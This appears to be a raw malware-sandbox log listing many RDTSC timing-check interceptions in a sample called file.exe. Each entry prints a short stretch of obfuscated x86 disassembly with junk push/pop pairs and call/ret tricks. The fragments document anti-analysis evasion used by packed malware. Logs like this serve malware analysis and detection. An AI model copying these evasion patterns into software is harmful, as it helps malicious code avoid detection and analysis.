                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C2A2 second address: 6C1B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+122D1BA2h] 0x0000000e push dword ptr [ebp+122D06B5h] 0x00000014 movsx ecx, bx 0x00000017 call dword ptr [ebp+122D2B51h] 0x0000001d pushad 0x0000001e cmc 0x0000001f xor eax, eax 0x00000021 jo 00007F57D451A1C7h 0x00000027 jmp 00007F57D451A1C1h 0x0000002c mov edx, dword ptr [esp+28h] 0x00000030 pushad 0x00000031 mov ebx, eax 0x00000033 mov esi, dword ptr [ebp+122D3A3Ah] 0x00000039 popad 0x0000003a mov dword ptr [ebp+122D396Ah], eax 0x00000040 sub dword ptr [ebp+122D24E2h], ebx 0x00000046 mov esi, 0000003Ch 0x0000004b mov dword ptr [ebp+122D18C9h], ecx 0x00000051 jmp 00007F57D451A1BAh 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a stc 0x0000005b pushad 0x0000005c jmp 00007F57D451A1C9h 0x00000061 mov esi, 50056AF6h 0x00000066 popad 0x00000067 lodsw 0x00000069 pushad 0x0000006a sbb di, 5179h 0x0000006f xor dword ptr [ebp+122D1FE5h], ecx 0x00000075 popad 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a cmc 0x0000007b mov dword ptr [ebp+122D364Eh], eax 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 sub dword ptr [ebp+122D364Eh], edx 0x0000008b nop 0x0000008c push eax 0x0000008d push edx 0x0000008e push eax 0x0000008f push edx 0x00000090 pushad 0x00000091 popad 0x00000092 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C3C3 second address: 83C3C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C3C7 second address: 83C3FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b ja 00007F57D451A1CCh 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007F57D451A1BCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C3FA second address: 83C3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C3FE second address: 83C408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F57D451A1B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C4D9 second address: 83C4E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C4E5 second address: 83C4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C4EC second address: 83C50A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F57D4F134E9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C50A second address: 83C525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+122D3A06h] 0x0000000e push 00000000h 0x00000010 push 9C17DF92h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop ecx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C702 second address: 83C730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007F57D4F134E9h 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F57D4F134D8h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CE4E second address: 85CE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85ABFB second address: 85AC14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85AC14 second address: 85AC1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85AC1A second address: 85AC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 jc 00007F57D4F134E2h 0x0000000d jns 00007F57D4F134D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B314 second address: 85B31A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B31A second address: 85B31F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B31F second address: 85B339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F57D451A1C1h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B339 second address: 85B349 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134DBh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B4BD second address: 85B4DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jo 00007F57D451A1B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F57D451A1C0h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B4DD second address: 85B4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82BFA4 second address: 82BFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D451A1C0h 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82BFBC second address: 82BFC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82BFC0 second address: 82BFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F57D451A1C5h 0x0000000e jno 00007F57D451A1BAh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82BFE8 second address: 82C006 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F57D4F134D6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF58 second address: 85BF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF60 second address: 85BF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF69 second address: 85BF6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C6AA second address: 85C6B4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F57D4F134D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C6B4 second address: 85C6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F57D451A1C8h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C6D4 second address: 85C6D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C6D8 second address: 85C6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F57D451A1BBh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C6EE second address: 85C705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D4F134E1h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CCC5 second address: 85CCD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1BAh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CCD5 second address: 85CCDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F57D4F134D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 860903 second address: 860918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push esi 0x00000008 jmp 00007F57D451A1BCh 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 860918 second address: 860941 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F57D4F134DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F57D4F134E3h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 860941 second address: 860971 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1C4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F57D451A1C2h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 860971 second address: 860975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 860975 second address: 86097B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 832D89 second address: 832DA8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F57D4F134E6h 0x00000008 pop edi 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8688BF second address: 8688CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8688CC second address: 8688E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134E8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869000 second address: 86902C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F57D451A1BCh 0x0000000b jnc 00007F57D451A1B6h 0x00000011 popad 0x00000012 jc 00007F57D451A1E6h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F57D451A1C2h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86902C second address: 86903C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F57D4F134D6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869BA3 second address: 869BA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869BA8 second address: 869BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F57D4F134D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F57D4F134ECh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869BD4 second address: 869BE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D451A1BAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A056 second address: 86A05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A05C second address: 86A064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A116 second address: 86A136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F57D4F134E3h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A2B0 second address: 86A2CF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F57D451A1B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F57D451A1C0h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A97D second address: 86A981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A981 second address: 86A985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A985 second address: 86A98B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A98B second address: 86A9A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A9A3 second address: 86A9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86AC26 second address: 86AC46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86AC46 second address: 86AC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86BD81 second address: 86BD86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86BD86 second address: 86BD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86DBB9 second address: 86DBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F27B second address: 86F286 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F57D4F134D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F286 second address: 86F2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F57D451A1B8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 pushad 0x00000023 mov bx, dx 0x00000026 popad 0x00000027 push 00000000h 0x00000029 js 00007F57D451A1B6h 0x0000002f push 00000000h 0x00000031 jmp 00007F57D451A1C2h 0x00000036 xor dword ptr [ebp+122D19F6h], edx 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e pushad 0x0000003f jns 00007F57D451A1B6h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F2E4 second address: 86F308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007F57D4F134E9h 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F308 second address: 86F319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D451A1BDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FCF8 second address: 86FD0A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F57D4F134D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F57D4F134DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87057D second address: 870589 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870589 second address: 87058D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874896 second address: 87489B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87489B second address: 8748BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F57D4F134D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F57D4F134E4h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8757BB second address: 8757BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8757BF second address: 8757D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F57D4F134DEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F70D second address: 82F724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D451A1C2h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 875932 second address: 875936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878DEE second address: 878DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878EA2 second address: 878EA8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878EA8 second address: 878EBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D451A1BFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879D88 second address: 879D99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879D99 second address: 879D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879D9F second address: 879DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B03A second address: 87B043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87BF14 second address: 87BF3E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F57D4F134DAh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F57D4F134DFh 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F57D4F134D6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B043 second address: 87B071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D451A1BEh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jg 00007F57D451A1C5h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DD43 second address: 87DDDD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F57D4F134E7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F57D4F134DAh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F57D4F134D8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b call 00007F57D4F134E2h 0x00000030 jnc 00007F57D4F134D8h 0x00000036 pop edi 0x00000037 pushad 0x00000038 mov dword ptr [ebp+124702E8h], ebx 0x0000003e popad 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007F57D4F134D8h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 00000018h 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b push 00000000h 0x0000005d mov edi, dword ptr [ebp+122D3976h] 0x00000063 xchg eax, esi 0x00000064 push eax 0x00000065 push edx 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DDDD second address: 87DDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DDE2 second address: 87DDE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DDE8 second address: 87DDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
